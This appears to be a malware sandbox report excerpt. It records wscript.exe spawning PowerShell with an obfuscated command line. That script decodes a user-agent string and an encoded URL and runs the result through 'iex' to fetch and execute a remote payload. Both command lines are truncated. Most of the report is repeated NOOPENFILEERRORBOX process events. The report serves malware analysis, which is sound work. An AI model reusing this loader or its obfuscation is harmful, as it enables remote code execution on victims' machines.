          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B965EA8 pushad ; retf 7_2_00007FFD9B965EA9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_079A0AB8 push eax; mov dword ptr [esp], ecx10_2_079A0AC4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_079A08D8 push eax; mov dword ptr [esp], ecx10_2_079A0AC4
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
